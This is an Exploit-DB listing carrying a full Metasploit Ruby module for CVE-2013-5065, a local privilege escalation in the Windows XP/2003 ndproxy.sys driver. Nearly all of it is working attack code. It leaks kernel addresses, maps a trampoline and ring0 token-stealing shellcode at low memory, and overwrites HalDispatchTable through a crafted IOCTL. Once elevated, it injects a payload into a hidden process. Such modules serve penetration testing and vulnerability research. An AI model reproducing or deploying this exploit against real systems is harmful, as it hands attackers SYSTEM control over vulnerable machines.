Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)

EDB-ID:

30392


Author:

Metasploit

Type:

local


Platform:

Windows

Date:

2013-12-17


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name'          => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
        SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
        processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
        to access an array unsafely, and the value is used to perform a call, leading to a NULL
        pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
        module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
        work the service "Routing and Remote Access" must be running on the target system.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery
          'ryujin', # python PoC
          'Shahin Ramezany', # C PoC
          'juan vazquez' # MSF module
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'Payload'       =>
        {
          'Space' => 4096,
          'DisableNops' => true
        },
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'       =>
        [
          [ 'Automatic', { } ],
          [ 'Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
              '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
              '_TOKEN' => "\xc8",    # Offset to TOKEN from the _EPROCESS struct
              '_UPID' => "\x84",     # Offset to UniqueProcessId FROM the _EPROCESS struct
              '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
            }
          ],
          [ 'Windows Server 2003 SP2',
            {
              'HaliQuerySystemInfo' => 0x1fa1e,
              '_KPROCESS' => "\x38",
              '_TOKEN' => "\xd8",
              '_UPID' => "\x94",
              '_APLINKS' => "\x98"
            }
          ]
        ],
      'References'    =>
        [
          [ 'CVE', '2013-5065' ],
          [ 'OSVDB' , '100368'],
          [ 'BID', '63971' ],
          [ 'EDB', '30014' ],
          [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'],
          [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
          [ 'URL', 'http://www.secniu.com/blog/?p=53' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ],
          [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ]
        ],
      'DisclosureDate'=> 'Nov 27 2013',
      'DefaultTarget' => 0
    }))

  end

  def add_railgun_functions
    session.railgun.add_function(
      'ntdll',
      'NtAllocateVirtualMemory',
      'DWORD',
      [
        ["DWORD", "ProcessHandle", "in"],
        ["PBLOB", "BaseAddress", "inout"],
        ["PDWORD", "ZeroBits", "in"],
        ["PBLOB", "RegionSize", "inout"],
        ["DWORD", "AllocationType", "in"],
        ["DWORD", "Protect", "in"]
      ])

    session.railgun.add_function(
      'ntdll',
      'NtDeviceIoControlFile',
      'DWORD',
      [
        [ "DWORD", "FileHandle", "in" ],
        [ "DWORD", "Event", "in" ],
        [ "DWORD", "ApcRoutine", "in" ],
        [ "DWORD", "ApcContext", "in" ],
        [ "PDWORD", "IoStatusBlock", "out" ],
        [ "DWORD", "IoControlCode", "in" ],
        [ "LPVOID", "InputBuffer", "in" ],
        [ "DWORD", "InputBufferLength", "in" ],
        [ "LPVOID", "OutputBuffer", "in" ],
        [ "DWORD", "OutPutBufferLength", "in" ]
      ])

    session.railgun.add_function(
      'ntdll',
      'NtQueryIntervalProfile',
      'DWORD',
      [
        [ "DWORD", "ProfileSource", "in" ],
        [ "PDWORD", "Interval", "out" ]
      ])
    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
    session.railgun.add_function(
      'psapi',
      'EnumDeviceDrivers',
      'BOOL',
      [
        ["PBLOB", "lpImageBase", "out"],
        ["DWORD", "cb", "in"],
        ["PDWORD", "lpcbNeeded", "out"]
      ])
    session.railgun.add_function(
      'psapi',
      'GetDeviceDriverBaseNameA',
      'DWORD',
      [
        ["LPVOID", "ImageBase", "in"],
        ["PBLOB", "lpBaseName", "out"],
        ["DWORD", "nSize", "in"]
      ])
  end

  def open_device(dev)

    invalid_handle_value = 0xFFFFFFFF

    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)

    handle = r['return']

    if handle == invalid_handle_value
      return nil
    end

    return handle
  end

  def find_sys_base(drvname)
    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")

    addresses.each do |address|
      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
      current_drvname = results['lpBaseName'][0..results['return'] - 1]
      if drvname == nil
        if current_drvname.downcase.include?('krnl')
          return [address, current_drvname]
        end
      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
        return [address, current_drvname]
      end
    end

    return nil
  end

  def ring0_shellcode(t)
    restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax

    tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
    tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
    tokenstealing << "\x33\xc0"                                               # xor eax, eax                     # eax = 0
    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                           # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
    tokenstealing << "\x8b\x40" + t['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
    tokenstealing << "\x8b\xc8"                                               # mov ecx, eax
    tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
    tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
    tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
    tokenstealing << "\x75\xe8"                                               # jne 0000101e ======================
    tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
    tokenstealing << "\x8b\xc1"                                               # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
    tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
    tokenstealing << "\x5b"                                                   # pop ebx                          # Restores ebx
    tokenstealing << "\x5a"                                                   # pop edx                          # Restores edx
    tokenstealing << "\xc2\x10"                                               # ret 10h                          # Away from the kernel!

    ring0_shellcode = restore_ptrs + tokenstealing
    return ring0_shellcode
  end

  def fill_memory(proc, address, length, content)

    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end

    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)

    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    else
      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
    end

    return address
  end

  def create_proc
    windir = expand_path("%windir%")
    cmd = "#{windir}\\System32\\notepad.exe"
    # run hidden
    begin
      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
    rescue Rex::Post::Meterpreter::RequestError
      # when running from the Adobe Reader sandbox:
      # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
      return nil
    end

    return proc.pid
  end

  def disclose_addresses(t)
    addresses = {}

    vprint_status("Getting the Kernel module name...")
    kernel_info = find_sys_base(nil)
    if kernel_info.nil?
      vprint_error("Failed to disclose the Kernel module name")
      return nil
    end
    vprint_good("Kernel module found: #{kernel_info[1]}")

    vprint_status("Getting a Kernel handle...")
    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
    kernel32_handle = kernel32_handle['return']
    if kernel32_handle == 0
      vprint_error("Failed to get a Kernel handle")
      return nil
    end
    vprint_good("Kernel handle acquired")


    vprint_status("Disclosing the HalDispatchTable...")
    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
    hal_dispatch_table = hal_dispatch_table['return']
    if hal_dispatch_table == 0
      vprint_error("Failed to disclose the HalDispatchTable")
      return nil
    end
    hal_dispatch_table -= kernel32_handle
    hal_dispatch_table += kernel_info[0]
    addresses["halDispatchTable"] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")

    vprint_status("Getting the hal.dll Base Address...")
    hal_info = find_sys_base("hal.dll")
    if hal_info.nil?
      vprint_error("Failed to disclose hal.dll Base Address")
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses["HaliQuerySystemInfo"] = hali_query_system_information

    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
    return addresses
  end


  def check
    vprint_status("Adding the railgun stuff...")
    add_railgun_functions

    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Detected
    end

    handle = open_device("\\\\.\\NDProxy")
    if handle.nil?
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)

    os = sysinfo["OS"]
    case os
    when /windows xp.*service pack 3/i
      return Exploit::CheckCode::Appears
    when /[2003|.net server].*service pack 2/i
      return Exploit::CheckCode::Appears
    when /windows xp/i
      return Exploit::CheckCode::Detected
    when /[2003|.net server]/i
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end

  end

  def exploit

    vprint_status("Adding the railgun stuff...")
    add_railgun_functions

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    my_target = nil
    if target.name =~ /Automatic/
      print_status("Detecting the target system...")
      os = sysinfo["OS"]
      if os =~ /windows xp.*service pack 3/i
        my_target = targets[1]
        print_status("Running against #{my_target.name}")
      elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
        my_target = targets[2]
        print_status("Running against #{my_target.name}")
      elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
        my_target = targets[2]
        print_status("Running against #{my_target.name}")
      end
    else
      my_target = target
    end

    if my_target.nil?
      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
    end

    print_status("Checking device...")
    handle = open_device("\\\\.\\NDProxy")
    if handle.nil?
      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
    else
      print_good("\\\\.\\NDProxy found!")
    end

    print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
    else
      print_good("Addresses successfully disclosed.")
    end


    print_status("Storing the kernel stager on memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode(my_target)
    kernel_shell_address = 0x1000
    result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    else
      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
    end

    print_status("Storing the trampoline to the kernel stager on memory...")
    trampoline = "\x90" * 0x38       # nops
    trampoline << "\x68"             # push opcode
    trampoline << [0x1000].pack("V") # address to push
    trampoline << "\xc3"             # ret
    trampoline_addr = 0x1
    result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing trampoline on memory")
    else
      print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
    end

    print_status("Storing the IO Control buffer on memory...")
    buffer = "\x00" * 1024
    buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
    buffer[28, 4] = [0x34].pack("V")      # In order to trigger the vulnerable call
    buffer_addr = 0x0d0d0000
    result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
    else
      print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")
    end

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    magic_ioctl = 0x8fff23c8
    # Values taken from the exploit in the wild, see references
    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)

    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

    print_status("Checking privileges after exploitation...")

    unless is_system?
      fail_with(Failure::Unknown, "The exploitation wasn't successful")
    end

    p = payload.encoded
    print_good("Exploitation successful! Creating a new process and launching payload...")
    new_pid = create_proc

    if new_pid.nil?
      print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
      return
    end

    print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
    if execute_shellcode(p, nil, new_pid)
      print_good("Enjoy")
    else
      fail_with(Failure::Unknown, "Error while executing the payload")
    end


  end

end